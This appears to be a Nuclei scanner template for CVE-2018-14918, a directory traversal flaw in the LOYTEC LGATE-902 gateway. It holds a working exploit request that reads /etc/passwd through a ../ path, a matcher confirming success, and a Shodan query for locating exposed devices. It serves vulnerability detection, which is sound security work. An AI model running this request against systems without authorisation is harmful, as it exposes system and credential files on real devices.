nuclei-templates/cves/2018/CVE-2018-14918.yaml

37 lines
1.2 KiB
YAML

id: CVE-2018-14918
info:
name: LOYTEC LGATE-902 6.3.2 - Directory Traversal
author: 0x_Akoko
severity: high
description: |
The path traversal (CVE-2018-14918) allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords.
reference:
- https://seclists.org/fulldisclosure/2019/Apr/12
- https://www.cvedetails.com/cve/CVE-2018-14918/
- http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-14918
cwe-id: CWE-22
metadata:
shodan-query: http.html:"LGATE-902"
verified: "true"
tags: cve,cve2018,lgate,loytec,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200